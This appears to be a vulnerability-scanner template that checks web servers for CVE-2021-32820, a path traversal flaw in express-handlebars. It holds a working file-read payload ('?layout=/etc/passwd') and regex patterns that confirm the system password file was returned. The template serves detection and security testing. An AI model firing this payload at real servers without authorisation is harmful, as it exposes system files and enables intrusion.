id: CVE-2021-32820 info: name: Express-handlebars Path Traversal author: dhiyaneshDk severity: medium reference: | - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/ - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json tags: cve,cve2021,expressjs,lfi requests: - method: GET path: - "{{BaseURL}}/?layout=/etc/passwd" matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:.*:0:0:" - "daemon:[x*]:0:0:" - "operator:[x*]:0:0:" part: body condition: or